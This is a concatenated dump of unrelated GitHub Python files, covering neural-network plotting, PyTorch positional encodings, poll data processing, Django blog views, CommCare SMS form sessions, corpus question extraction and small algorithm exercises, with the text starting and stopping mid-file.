key=lambda x:x[1]))\n \n\n def rank_models(self,last_errors, n_weight_matrices):\n \"\"\" Function to rank the models by their simplicity and error\n Parameters\n ----------\n last_errors : dict\n Dictionary with the name of the model as key and the error of the last epoch as value\n n_weight_matrices : dict\n Dictionary with the name of the model as key and the number of weight matrices as value\n Returns\n -------\n best : str\n Name of the best model\n avg : str\n Name of the average model\n worst : str\n Name of the worst model\n \"\"\"\n sorted_by_errors = self.sort_by_value(last_errors)\n sorted_params = {}\n for key in sorted_by_errors:\n sorted_params[key] = n_weight_matrices[key]\n sorted_simplicity = self.sort_by_value(sorted_params)\n ordered_models = list(sorted_simplicity.keys())\n indexes = [0,-len(ordered_models)//2-1,-1]\n best = ordered_models[indexes[0]]\n avg = ordered_models[indexes[1]]\n worst = ordered_models[indexes[2]]\n return best, avg, worst\n\n def plot_stage(self, data, plot_type, hl, size, indexes, label_names):\n \"\"\" Function that plots the results of the training and validation stages\n Parameters\n ----------\n data : [dict]\n List of dictionaries with the data to plot, the dictionary contains the name of the model as key and the predicted values as values\n plot_type : str\n Type of plot to make, can be 'error', 'local_grad' or 'pred'\n hl : int\n Number of hidden layers of the models to plot\n size : tuple\n Size of the plot\n indexes : [str]\n List of the names of the models to plot\n label_names : [str]\n List of the labels of the models to plot (best, avg, worst for example)\n \"\"\"\n\n stages = ['training', 'validation']\n for i in range(len(data)):\n plot_title, x_label, y_label, filepath = self.set_params(plot_type, stages[i], hl)\n self.plot_comparison(data[i],indexes, label_names, plot_title, x_label, y_label, filepath, size)\n\n\n \n def plot_results(self):\n \"\"\"Function that finds the best, average and worst model, plots the results of the predictions,\n saves the errors of the models and makes comparison plots between models with the same number of\n hidden layers\n \"\"\"\n test_errors_pairs = []\n test_errors = []\n validation_errors = []\n val_errors = []\n val_preds = []\n test_preds = []\n\n for hl in self.results:\n predictions_models = self.results[hl][4]\n for key in predictions_models:\n pred_not_sorted = predictions_models[key]\n y_pred = pred_not_sorted[np.argsort(self.index_test)]\n test_error = np.mean(np.power(self.Y_test_sorted - y_pred,2))\n test_errors.append(test_error)\n test_errors_pairs.append((key, test_error))\n test_preds.append(y_pred)\n predictions_models_vals = self.results[hl][7]\n\n for key in predictions_models_vals:\n \n pred_not_sorted_val = predictions_models_vals[key]\n y_pred_val = pred_not_sorted_val[np.argsort(self.indices_val)]\n\n error_val = np.mean(np.power(self.Y_validation - y_pred_val,2))\n val_preds.append(y_pred_val)\n val_errors.append(error_val)\n validation_errors.append((key, error_val))\n \n self.plot_best(val_errors, val_preds, validation_errors, 'validation')\n self.plot_best(test_errors, test_preds, test_errors_pairs, 'test')\n\n\n test_errors\n df = pd.DataFrame(test_errors_pairs, columns=['model', 'test_error'])\n df.to_csv('Results/csv/test_errors.csv', index=True)\n df = pd.DataFrame(validation_errors, columns=['model', 'validation_error'])\n df.to_csv('Results/csv/validation_errors.csv', index=True)\n\n for hl in self.results:\n \n results_dics = self.results[hl]\n best,avg,worst = self.rank_models(results_dics[5],results_dics[6])\n\n label_names = ['best', 'avg', 'worst']\n indexes = [best, avg, worst]\n \n size = (6,5)\n \n graph_types = ['error', 'local_grad']\n for i in range(len(graph_types)):\n self.plot_stage(results_dics[2*i:2*(i+1)], graph_types[i], hl, size, indexes, label_names)\n plot_title, x_label, y_label, filepath = self.set_params('pred', 'Test', hl)\n self.plot_comparison(results_dics[4],indexes, label_names, plot_title, x_label, y_label, filepath, size, plot_pred = True, obs=self.Y_test)\n\n def plot_best(self, val_errors, val_preds, validation_errors, stage):\n \"Function to plot the predictions of the best model\"\n sort_val = np.argsort(val_errors)\n best_i = sort_val[0]\n avg_i = sort_val[len(sort_val)//2 -1]\n worst_i = sort_val[-1]\n\n best_model = val_preds[best_i]\n avg_model = val_preds[avg_i]\n worst_model = val_preds[worst_i]\n\n best_model_name = validation_errors[best_i][0]\n avg_model_name = validation_errors[avg_i][0]\n worst_model_name = validation_errors[worst_i][0]\n\n\n data = {\n best_model_name: best_model,\n avg_model_name: avg_model,\n worst_model_name: worst_model\n }\n indexes = [best_model_name,avg_model_name,worst_model_name]\n label_names = ['best', 'avg', 'worst']\n\n size = (7,7)\n\n plot_title, x_label, y_label, filepath = self.set_params('pred', stage, None)\n self.plot_comparison(data,indexes, label_names, plot_title, x_label, y_label, filepath, size, plot_pred = True, obs=self.Y_validation)\n\n data_best = {\n best_model_name: best_model\n }\n indexes = [best_model_name]\n label_names = ['best']\n plot_title = 'Predicted values od the best model vs real observations'\n x_label = 'P'\n y_label = 'Y'\n filepath = 'Results/Test/best pred.png'\n self.plot_comparison(data_best,indexes, label_names, plot_title, x_label, y_label, filepath, size, plot_pred = True, obs=self.Y_validation)\n \n\n\n def plot_validation(self, df_list,titles,x_labels, y_labels,filepath, size= (5,5)):\n \"\"\" Function to plot the results of the validation stage\n Parameters\n ----------\n df_list : [pd.DataFrame]\n List of dataframes with the data to plot\n titles : [str]\n List of the titles of the plots\n x_labels : [str]\n List of the labels of the x axis\n y_labels : [str]\n List of the labels of the y axis\n filepath : str\n Path to save the image of the plot\n size : tuple\n Size of the plot\n \n \"\"\"\n num_dfs = len(df_list)\n fig, ax = plt.subplots(num_dfs,1,figsize=size,sharex=True)\n for l in range(num_dfs):\n df = df_list[l]\n df.plot(marker=\".\",rot=45,ax=ax[l],legend=False, title= titles[l])\n ax[l].set_xlabel(x_labels[l])\n ax[l].set_ylabel(y_labels[l])\n lines0, labels0 = [sum(x, []) for x in zip(*[ax[l].get_legend_handles_labels()])]\n \n fig.tight_layout()\n plt.savefig(filepath,bbox_inches='tight')\n plt.close()\n \n\n def create_paths(self, directories):\n \"\"\" Function to create directories to save the results\"\"\"\n for directory in directories:\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n\ndef get_data():\n \"\"\" Function to get the data from the file data.txt\n Returns\n -------\n data : np.array\n Numpy array (N x M) of the entire data set\n Xindex : [int]\n List of indices of the columns of the features or independent variables\n Yindex : [int]\n List of indices of the columns of the outputs or dependent variables\n \"\"\"\n data = np.loadtxt('Data/data.txt', delimiter=',')\n Xindex = [0,1,2,3]\n Yindex = [4]\n return data, Xindex, Yindex\n\n\nif __name__ == \"__main__\":\n\n data, Xindex, Yindex = get_data()\n compare = Comparison(data, Xindex, Yindex ,3,5,[0.2,0.5,0.9],50)","repo_name":"msuribec/IANN","sub_path":"src/perceptron.py","file_name":"perceptron.py","file_ext":"py","file_size_in_byte":31424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23340129630","text":"import math\n\nimport torch\nfrom torch import nn\n\n\ndef positional_encoding(max_len, d_model):\n pe = torch.zeros(max_len, d_model)\n position = torch.arange(0, max_len, dtype=torch.float).unsqueeze(1)\n # Changed log from 10_000.0 to max_len, improves accuracy for hard labyrinth\n div_term = torch.exp(\n torch.arange(0, d_model, 2).float() * (-math.log(max_len) / d_model)\n )\n pe[:, 0::2] = torch.sin(position * div_term)\n pe[:, 1::2] = torch.cos(position * div_term)\n return pe\n\n\n@torch.jit.script\ndef _psi(ab: torch.Tensor, c: torch.Tensor, t_minus_i: torch.Tensor) -> torch.Tensor:\n # ab: [1, T, F ... F]\n # c: [1, T, 1 ... 1]\n # t_minus_i: [1, T, 1 ... 1]\n return torch.exp(c * ab * t_minus_i)\n\n\n@torch.jit.script\ndef _compute_state(\n ab: torch.Tensor,\n c: torch.Tensor,\n x: torch.Tensor,\n n_to_zero: torch.Tensor,\n one_to_np1: torch.Tensor,\n T: int,\n prev_state: torch.Tensor,\n):\n state = torch.cumsum(x * _psi(ab, c, n_to_zero[:T]), dim=1) * _psi(\n ab, c, -n_to_zero[:T]\n )\n # Add to previous output\n # Shift the previous inputs by 1 to T\n # because they are now 1 to T timesteps older with the\n # addition of T new timesteps present in x\n psi_shift = _psi(ab, c, one_to_np1[:T])\n shifted_prev_state = prev_state * psi_shift\n output = state + shifted_prev_state\n return output\n\n\nclass PhaserEncoding(nn.Module):\n def __init__(\n self,\n max_len: int,\n d_model: int,\n num_dims: int,\n max_period: int = 1024,\n dtype: torch.dtype = torch.double,\n decay_bias: float = -0.5,\n freq_scale: float = 1.0,\n fudge_factor: float = 0.025,\n soft_clamp: bool = False,\n ):\n \"\"\"A phaser-encoded aggregation operator\n Inputs:\n max_len: Maximum length of the batch in timesteps. Note this\n is not the episode length, but rather the batch length.\n d_model: Feature dimension of the model\n num_dims: Number of feature dimensions of the model, each should be\n of size d_model\n max_period: This determines the initial maximum sinusoidal period. It should\n be set to the maximum episode length if known. Until the parameters\n change, the model will be unable to differentiate relative time\n differences greater than max_period.\n dtype: Whether to use floats or doubles. Note doubles enables\n significantly more representational power for a little\n extra compute\n decay_bias: How much bias to exponential decay. Higher -> biased\n towards shorter-term memory. This should roughly be between 0 and 5\n since this value goes through a sigmoid activation.\n freq_scale: How much to bias the sinusoidal part of the encoding.\n Lower -> lower frequencies, biased towards longer-term memory\n and being unable to tell the difference between x_t and x_{t+1}\n Higher -> higher frequencies, biased towards quick reactions/control\n and more likely to differentiate between x_t and x_{t+1}\n This should be a positive number.\n fudge_factor: A small positive number to prevent overflows\n \"\"\"\n super().__init__()\n self.num_dims = num_dims\n self.d_model = d_model\n # Set the upper bound to zero because our prior knowledge\n # dictates experiences from the past never become stronger,\n # only fade. Also, this could cause explosions as we magnify\n # values at each timestep\n # To prevent overflows, ensure exp(limit * max_len) < {float,double}\n # limit * max_len < log({float,double})\n # limit == log({float,double}) / max_len - fudge_factor\n assert dtype in [torch.float, torch.double]\n self.dtype = dtype\n dtype_max = torch.finfo(dtype).max\n self.limit = math.log(dtype_max) / max_len - fudge_factor\n self.soft_clamp = soft_clamp\n\n # [1, 1 | 1, ... 1, F]\n # [B, T | F, ... F, F]\n param_shape = [1, 1] + [self.d_model] * num_dims\n a = torch.linspace(\n 0 - fudge_factor, -self.limit + fudge_factor, self.d_model**num_dims\n ).reshape(param_shape)\n b = (\n 2\n * torch.pi\n / torch.linspace(max_period, torch.pi, self.d_model**num_dims).reshape(\n param_shape\n )\n )\n # b = b.flatten()[torch.randperm(b.numel())].reshape(b.shape)\n self.c = nn.Parameter(torch.tensor(decay_bias))\n self.d = nn.Parameter(torch.tensor(freq_scale))\n self.ab = nn.Parameter(torch.complex(a, b))\n\n torch.nn.init.normal_(self.ab.real, mean=0, std=0.01)\n self.ab.real.data.clamp_(-self.limit + fudge_factor, 0 - fudge_factor)\n\n n_to_zero = torch.arange(max_len, dtype=dtype).flip(0)\n self.register_buffer(\"n_to_zero\", n_to_zero)\n one_to_np1 = torch.arange(1, max_len + 1, dtype=dtype)\n self.register_buffer(\"one_to_np1\", one_to_np1)\n\n def psi(self, t_minus_i):\n assert t_minus_i.dim() == 1\n\n T = t_minus_i.shape[0]\n F = [self.d_model] * self.num_dims\n broadcast = [1] * len(F)\n # Compute for all filters/fourier series terms\n # e^(t * (a + bi))\n if self.soft_clamp:\n real = -self.limit * (self.c + self.ab.real).sigmoid()\n else:\n real = (self.c + self.ab.real).clamp(-self.limit, 0)\n imag = self.d * self.ab.imag\n return torch.exp(\n torch.complex(real, imag) * t_minus_i.reshape(1, T, *broadcast)\n )\n # return _psi(self.ab, self.c, t_minus_i.reshape(1, T, *broadcast))\n\n def recurrent_update2(self, x, state):\n B, T, *F = x.shape\n\n prev_state = torch.view_as_complex(state)\n ones = torch.tensor([-1.0, 1.0], dtype=torch.complex128, device=x.device)\n\n if self.training:\n psi_minus_one, psi_one = self.psi(ones).unbind(1)\n else:\n psi_minus_one, psi_one = self.psi(ones).unbind(1)\n psi_n_to_zero = psi_one.expand(1, T, -1, -1, -1).cumprod(1).flip(1)\n minus_psi_n_to_zero = psi_minus_one.expand(1, T, -1, -1, -1).cumprod(1).flip(1)\n\n # Convert back to float for performance\n state = torch.cumsum(x * psi_n_to_zero, dim=1) * minus_psi_n_to_zero\n\n shift = psi_n_to_zero.flip(1) * psi_one\n shifted_prev_state = prev_state * shift\n output = state + shifted_prev_state\n return output.to(torch.complex64)\n\n def recurrent_update(self, x, state):\n B, T, *F = x.shape\n prev_state = torch.view_as_complex(state)\n\n state = torch.cumsum(x * self.psi(self.n_to_zero[:T]), dim=1) * self.psi(\n -self.n_to_zero[:T]\n )\n # Add to previous output\n # Shift the previous inputs by 1 to T\n # because they are now 1 to T timesteps older with the\n # addition of T new timesteps present in x\n psi_shift = self.psi(self.one_to_np1[:T])\n shifted_prev_state = prev_state * psi_shift\n output = state + shifted_prev_state\n return output.to(torch.complex64)\n\n def forward(self, x, state):\n return self.recurrent_update(x, state)\n\n\nclass ScaledPositionalEncoding(nn.Embedding):\n def __init__(self, num_embeddings, embedding_dim, **kwargs):\n super().__init__(num_embeddings, embedding_dim, **kwargs)\n self.a = nn.Parameter(torch.rand(embedding_dim))\n num_zero_weights = round(0.75 * embedding_dim)\n zero_idx = torch.randperm(embedding_dim)[:num_zero_weights]\n self.a.data[zero_idx] = 0\n\n def forward(self, idx):\n return super().forward(idx) * self.a\n\n\nclass SimpleScaledEncoding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n v = torch.zeros(d_model)\n v[-4:] = 1.0 / max_len\n self.register_buffer(\"v\", v)\n\n def forward(self, idx):\n return idx.reshape(-1, 1) * self.v\n\n\nclass Time2Vec(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n self.max_len = max_len\n self.net = nn.Linear(1, d_model)\n # self.emb = nn.Embedding(max_len, 2 * d_model)\n\n def forward(self, idx):\n # [B * T, 1]\n idx = idx.reshape(-1, 1)\n emb = self.net(idx.float()).reshape(-1, self.d_model)\n zero, rest = emb.split([1, self.d_model - 1], dim=-1)\n return torch.cat([zero, rest.sin()], dim=-1)\n\n\nclass Base2Embedding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n self.max_len = max_len\n mask = 2 ** torch.arange(d_model)\n # Overflow, zero these for sanity\n # seq_len <= 65536\n mask[16:] = mask[16]\n assert max_len < 2**16 - 1\n self.register_buffer(\"mask\", mask)\n\n def forward(self, idx):\n return idx.unsqueeze(-1).bitwise_and(self.mask).ne(0).float()\n\n\nclass PerceptronEmbedding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n self.lin = nn.Linear(1, d_model, bias=False)\n\n def forward(self, idx):\n idx = idx.float()\n return self.lin(idx.reshape(-1, 1)).sin()\n\n\nclass SoftExponentialEmbedding(nn.Module):\n def __init__(self, max_len, d_model):\n super().__init__()\n self.d_model = d_model\n self.a = nn.Parameter([-1.0])\n self.lin = nn.Linear(1, d_model, bias=False)\n\n def forward(self, idx):\n idx = idx.float()\n self.a.data = self.a.data.clamp_(-1.0, 1e-4)\n (torch.exp(self.a * idx) - 1) / self.a + self.a\n return self.lin(idx.reshape(-1, 1)).sin()\n","repo_name":"proroklab/popgym","sub_path":"popgym/baselines/models/embeddings.py","file_name":"embeddings.py","file_ext":"py","file_size_in_byte":9855,"program_lang":"python","lang":"en","doc_type":"code","stars":110,"dataset":"github-code","pt":"21"} +{"seq_id":"25532818657","text":"import pandas as pd\n\ndf = pd.read_csv('./data/poll/province_poll_data.csv')\ndf['Date'] = df['Time'].apply(lambda datestring: pd.to_datetime(datestring))\n\nnational = df[df['Province'] == 'National']\nnational = national.sort_values('Date', ascending=False)\nnational = national.reset_index()\nlastDate = national['Date'][0]\n\ndf = df[df['Date'] == lastDate]\n\ndef get_max(row):\n if row['Liberals'] > row['NDP'] and row['Liberals'] > row['Conservative']:\n return 'Liberals'\n elif row['Conservative'] > row['NDP'] and row['Conservative'] > row['Liberals']:\n return 'Conservative'\n else:\n return 'NDP'\ndf['Max'] = df.apply(get_max, axis=1)\n\ncolumns = ['Conservative', 'Liberals', 'NDP', 'Province', 'Max']\ndf = df[columns]\n\ndf.to_json('./dashboard/public/static/poll_data_processed.json', orient='records')","repo_name":"Abhishek-Sunnak/PR-Management-App-Canada-Elections","sub_path":"dashboard_scripts/poll/poll_data_processed.py","file_name":"poll_data_processed.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39218131872","text":"#encoding=utf-8\nimport markdown\n\nfrom django.shortcuts import render, get_object_or_404\nfrom django.http import HttpResponseRedirect\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\nfrom django.contrib import messages\n\nfrom taggit.models import Tag\n\n\nfrom .models import Article, Famouswords, Comment, Category\nfrom .forms import CommentForm\n# Create your views here.\n\ndef index(request, tag_slug=None):\n article_list = Article.objects.all()\n tags = Tag.objects.all()\n categories = Category.objects.all()\n indexword = Famouswords.objects.order_by('?')[:1]\n tag = None\n\n if tag_slug:\n tag = get_object_or_404(Tag, slug=tag_slug)\n article_list = article_list.filter(tags__in=[tag])\n\n paginator = Paginator(article_list, 5)\n page = request.GET.get('page')\n\n try:\n articles = paginator.page(page)\n except PageNotAnInteger:\n articles = paginator.page(1)\n except EmptyPage:\n articles = paginator.page(paginator.num_pages)\n\n context = {'articles': articles,\n 'indexword': indexword,\n 'categories': categories,\n 'tags': tags}\n\n return render(request, 'index.html', context)\n\n\ndef article_page(request, article_id):\n article = get_object_or_404(Article, pk=article_id)\n\n comments = article.comments.filter(active=True)\n\n if request.method == 'POST':\n comment_form = CommentForm(data=request.POST)\n if comment_form.is_valid():\n new_comment = comment_form.save(commit=False)\n new_comment.article = article\n new_comment.save()\n messages.success(request, '评论已经提交')\n return HttpResponseRedirect(article.get_absolute_url())\n else:\n comment_form = CommentForm()\n article.content = markdown.markdown(article.content,\n extensions=[\n 'markdown.extensions.extra',\n 'markdown.extensions.codehilite',\n 'markdown.extensions.toc',\n ])\n context = {'article': article,\n 'comments': comments,\n 'comment_form': comment_form}\n return render(request, 'article_page.html', context)\n\n\ndef article_change(request, article_id):\n return render(request, 'article_change.html')\n\n\ndef tag_list(request):\n tags = Tag.objects.all()\n return render(request, 'tag_list.html', {'tags': tags})\n\ndef about_me(request):\n return render(request, 'about.html')\n\n\n\n","repo_name":"kaiaiz/django_mytweets","sub_path":"application/blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2610,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32853403401","text":"from .models import XFormsSession, XFORMS_SESSION_SMS\nfrom datetime import datetime\nfrom corehq.apps.cloudcare.touchforms_api import get_session_data\nfrom touchforms.formplayer.api import (\n XFormsConfig,\n DigestAuth,\n get_raw_instance,\n InvalidSessionIdException,\n)\nfrom touchforms.formplayer import sms as tfsms\nfrom django.conf import settings\nfrom xml.etree.ElementTree import XML, tostring\nfrom dimagi.utils.parsing import json_format_datetime\nfrom corehq.apps.receiverwrapper.util import get_submit_url\nfrom receiver.util import spoof_submission\nfrom couchforms.models import XFormInstance\nimport re\n\nCOMMCONNECT_DEVICE_ID = \"commconnect\"\n\nAUTH = DigestAuth(settings.TOUCHFORMS_API_USER, \n settings.TOUCHFORMS_API_PASSWORD)\n\ndef start_session(domain, contact, app, module, form, case_id=None, yield_responses=False, session_type=XFORMS_SESSION_SMS, case_for_case_submission=False):\n \"\"\"\n Starts a session in touchforms and saves the record in the database.\n \n Returns a tuple containing the session object and the (text-only) \n list of generated questions/responses based on the form.\n \n Special params:\n yield_responses - If True, the list of xforms responses is returned, otherwise the text prompt for each is returned\n session_type - XFORMS_SESSION_SMS or XFORMS_SESSION_IVR\n case_for_case_submission - True if this is a submission that a case is making to alter another related case. For example, if a parent case is filling out\n an SMS survey which will update its child case, this should be True.\n \"\"\"\n # NOTE: this call assumes that \"contact\" will expose three\n # properties: .raw_username, .get_id, and .get_language_code\n session_data = get_session_data(domain, contact, case_id, device_id=COMMCONNECT_DEVICE_ID)\n \n # since the API user is a superuser, force touchforms to query only\n # the contact's cases by specifying it as an additional filterp\n if contact.doc_type == \"CommCareCase\":\n session_data[\"additional_filters\"] = {\n \"case_id\": contact.get_id,\n \"footprint\" : \"True\",\n \"include_children\" : \"True\" if case_for_case_submission else \"False\",\n }\n else:\n session_data[\"additional_filters\"] = { \"user_id\": contact.get_id }\n \n language = contact.get_language_code()\n config = XFormsConfig(form_content=form.render_xform(),\n language=language,\n session_data=session_data,\n auth=AUTH)\n \n \n now = datetime.utcnow()\n # just use the contact id as the connection id. may need to revisit this\n connection_id = contact.get_id\n session_start_info = tfsms.start_session(config)\n session = XFormsSession(connection_id=connection_id,\n session_id = session_start_info.session_id,\n start_time=now, modified_time=now, \n form_xmlns=form.xmlns,\n completed=False, domain=domain,\n app_id=app.get_id, user_id=contact.get_id,\n session_type=session_type)\n session.save()\n responses = session_start_info.first_responses\n # Prevent future resource conflicts by getting the session again from the db\n # since the session could have been updated separately in the first_responses call\n session = XFormsSession.get(session._id)\n if yield_responses:\n return (session, responses)\n else:\n return (session, _responses_to_text(responses))\n\ndef get_responses(msg):\n return _get_responses(msg.domain, msg.couch_recipient, msg.text)\n\ndef _get_responses(domain, recipient, text, yield_responses=False, session_id=None, update_timestamp=True):\n \"\"\"\n Try to process this message like a session-based submission against\n an xform.\n \n Returns a list of responses if there are any.\n \"\"\"\n session = None\n if session_id is not None:\n if update_timestamp:\n # The IVR workflow passes the session id\n session = XFormsSession.latest_by_session_id(session_id)\n else:\n # The SMS workflow grabs the open sms session\n session = XFormsSession.get_open_sms_session(domain, recipient)\n if session is not None:\n session_id = session.session_id\n\n if update_timestamp and session is not None:\n session.modified_time = datetime.utcnow()\n session.save()\n\n if session_id is not None:\n # TODO auth\n if yield_responses:\n return list(tfsms.next_responses(session_id, text, auth=None))\n else:\n return _responses_to_text(tfsms.next_responses(session_id, text, auth=None))\n\ndef _responses_to_text(responses):\n return [r.text_prompt for r in responses if r.text_prompt]\n\n\"\"\"\nGets the raw instance of the session's form and submits it. This is used with\nsms and ivr surveys to save all questions answered so far in a session that \nneeds to close.\n\nIf include_case_side_effects is False, no case create / update / close actions\nwill be performed, but the form will still be submitted.\n\nThe form is only submitted if the smsforms session has not yet completed.\n\"\"\"\ndef submit_unfinished_form(session_id, include_case_side_effects=False):\n session = XFormsSession.latest_by_session_id(session_id)\n if session is not None and session.end_time is None:\n # Get and clean the raw xml\n try:\n xml = get_raw_instance(session_id)\n except InvalidSessionIdException:\n session.end(completed=False)\n session.save()\n return\n root = XML(xml)\n case_tag_regex = re.compile(\"^(\\{.*\\}){0,1}case$\") # Use regex in order to search regardless of namespace\n meta_tag_regex = re.compile(\"^(\\{.*\\}){0,1}meta$\")\n timeEnd_tag_regex = re.compile(\"^(\\{.*\\}){0,1}timeEnd$\")\n current_timstamp = json_format_datetime(datetime.utcnow())\n for child in root:\n if case_tag_regex.match(child.tag) is not None:\n # Found the case tag\n case_element = child\n case_element.set(\"date_modified\", current_timstamp)\n if not include_case_side_effects:\n # Remove case actions (create, update, close)\n child_elements = [case_action for case_action in case_element]\n for case_action in child_elements:\n case_element.remove(case_action)\n elif meta_tag_regex.match(child.tag) is not None:\n # Found the meta tag, now set the value for timeEnd\n for meta_child in child:\n if timeEnd_tag_regex.match(meta_child.tag):\n meta_child.text = current_timstamp\n cleaned_xml = tostring(root)\n \n # Submit the xml and end the session\n resp = spoof_submission(get_submit_url(session.domain, session.app_id), cleaned_xml, hqsubmission=False)\n xform_id = resp['X-CommCareHQ-FormID']\n session.end(completed=False)\n session.submission_id = xform_id\n session.save()\n \n # Tag the submission as a partial submission\n xform = XFormInstance.get(xform_id)\n xform.partial_submission = True\n xform.survey_incentive = session.survey_incentive\n xform.save()\n\n\n","repo_name":"gmimano/commcaretest","sub_path":"corehq/apps/smsforms/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71105982452","text":"import os\nimport re\nimport pandas as pd\nimport xml.etree.ElementTree as ET\n\n# extract questions from cleaned corpus ==> list of tuples [(context_previous, question, context_next)] ==> dataframe ==> csv\n\ndef get_tags(file_path, tag):\n root = ET.parse(file_path).getroot()\n tags = [t for t in root.iter(tag)]\n return tags\n\ndef check_discourse_markers(text):\n discourse_markers = ['ah oui ?', 'ah bon ?', 'oui ?', 'hein ?']\n for marker in discourse_markers:\n if text == marker :\n return False\n return True\n\ndef get_previous_context(i, tags):\n context_p = ''\n for o in range(4, -1, -1):\n if tags[i-o-1] != '\\n':\n speaker_p = '#' + tags[i-o-1].attrib['speaker'].strip('\\n')\n context_p += (speaker_p + tags[i-o-1].text.strip('\\n')+ ' | ')\n return context_p\n\ndef get_next_text(i, tags):\n context_n = ''\n for o in range(5):\n if tags[i+o+1] != '\\n':\n speaker_n = '#' + tags[i+o+1].attrib['speaker'].strip('\\n') + ' : '\n context_n += (speaker_n + tags[i+o+1].text.strip('\\n') + ' | ')\n return context_n\n\ndef get_questions_with_contexts(dir):\n questions_with_contexts = []\n for file in os.listdir(dir):\n file_path = os.path.join(dir, file)\n tags = get_tags(file_path, 'Turn')\n try:\n for i in range(5, len(tags)-5):\n tag = tags[i]\n text = tag.text\n try:\n for t in text.split('\\n'):\n if '?' in t and check_discourse_markers(t):\n speaker = '#' + tag.attrib['speaker'] + ' : '\n t = speaker + t\n context_p = get_previous_context(i, tags)\n context_n = get_next_text(i, tags)\n questions_with_contexts.append((context_p, t, context_n))\n except:\n pass\n except:\n pass\n return questions_with_contexts\n\ndef replace_crlf(text):\n text = re.sub(r\"\\n+\", \"\\n\", text)\n\nif __name__ == \"__main__\":\n questions_with_contexts = get_questions_with_contexts('../cleaned_eslo_entretien')\n df = pd.DataFrame(questions_with_contexts, columns=['previous_5_turn', 'question', 'next_5_turn'])\n df.previous_5_turn = df.previous_5_turn.apply(replace_crlf)\n df.next_5_turn = df.next_5_turn.apply(replace_crlf)\n df.to_csv('eslo_entretien.csv', sep=';', encoding='utf8')","repo_name":"kittog/questionSponPrep","sub_path":"corpus/ESLO/scripts/extract_question_eslo.py","file_name":"extract_question_eslo.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10076958198","text":"'''\n1228. 等差数列中缺失的数字\n有一个数组,其中的值符合等差数列的数值规律,也就是说:\n\n在 0 <= i < arr.length - 1 的前提下,arr[i+1] - arr[i] 的值都相等。\n我们会从该数组中删除一个 既不是第一个 也 不是最后一个的值,得到一个新的数组 arr。\n\n给你这个缺值的数组 arr,请你帮忙找出被删除的那个数。\n\n\n\n示例 1:\n\n输入:arr = [5,7,11,13]\n输出:9\n解释:原来的数组是 [5,7,9,11,13]。\n示例 2:\n\n输入:arr = [15,13,12]\n输出:14\n解释:原来的数组是 [15,14,13,12]。\n\n\n提示:\n\n3 <= arr.length <= 1000\n0 <= arr[i] <= 10^5\n\n1228. Missing Number In Arithmetic Progression\nIn some array arr, the values were in arithmetic progression: the values arr[i+1] - arr[i] are all equal for every 0 <= i < arr.length - 1.\n\nThen, a value from arr was removed that was not the first or last value in the array.\n\nReturn the removed value.\n\n\n\nExample 1:\n\nInput: arr = [5,7,11,13]\nOutput: 9\nExplanation: The previous array was [5,7,9,11,13].\nExample 2:\n\nInput: arr = [15,13,12]\nOutput: 14\nExplanation: The previous array was [15,14,13,12].\n\n\nConstraints:\n\n3 <= arr.length <= 1000\n0 <= arr[i] <= 10^5\n'''\n\n\nclass Solution(object):\n def missingNumber(self, arr):\n \"\"\"\n :type arr: List[int]\n :rtype: int\n \"\"\"\n if arr[-1] < arr[0]:\n arr = arr[::-1]\n a = min(arr[1] - arr[0], arr[-1] - arr[-2])\n if a == 0:\n return arr[0]\n\n num = (arr[-1] - arr[0]) / a + 1\n # print(a, num)\n sum_ = (arr[0] + arr[-1]) * num / 2\n\n return sum_ - sum(arr)\n","repo_name":"MecaCho/algorithms_training","sub_path":"algorithms/binary_search/leetcode-1228-MissingNumberInArithmeticProgression.py","file_name":"leetcode-1228-MissingNumberInArithmeticProgression.py","file_ext":"py","file_size_in_byte":1648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28178024692","text":"class Queens:\r\n def nQueens(self, n):\r\n self.count = 0\r\n self.a = [0 for i in range(n+1)]\r\n self.Queens1(1,n)\r\n return self.count\r\n\r\n def Queens1(self,i,n):\r\n if i > n:\r\n self.count += 1\r\n return\r\n for j in range(i, n+1):\r\n self.a[j] = j\r\n if self.Place(i):\r\n self.Queens1(i+1, n)\r\n\r\n def Place(self, i):\r\n for j in range(1, i):\r\n if self.a[j]==self.a[i] or self.a[j]-self.a[i]==j-i or self.a[j]-self.a[i]==i-j:\r\n return 0\r\n return 1\r\n","repo_name":"jasonusaco/Leetcode-Practice","sub_path":"DP&Recursion/9.9.py","file_name":"9.9.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40239957791","text":"import sys\nimport os\nimport json\nimport pickle\nimport shutil\nimport random\nimport time\nimport itertools\nimport argparse\n\nimport torch\nimport numpy as np\nimport importlib\nimport matplotlib.pyplot as plt\n\nfrom project.policies import EpsilonGreedyPolicy\nfrom project.test_network import test_episodes\nfrom project.train_network import train_episodes\n\n# constants\nENV_KEY = 'environments'\nNET_KEY = 'networks'\nBAT_KEY = 'batch-sizes'\nDIS_KEY = 'discount-factors'\nGRA_KEY = 'semi-gradient'\nLAYER_KEY = 'nn_layers'\nTRAIN_EPS_KEY = 'train-episodes'\nTEST_EPS_KEY = 'test-episodes'\nLR_KEY = 'lr'\nLR_SS_KEY = 'lr_step_size'\nLR_GAMMA_KEY = 'lr_gamma'\nREP_MEM_KEY = 'replay_memory'\nSEED_KEY = 'seed'\n\n# 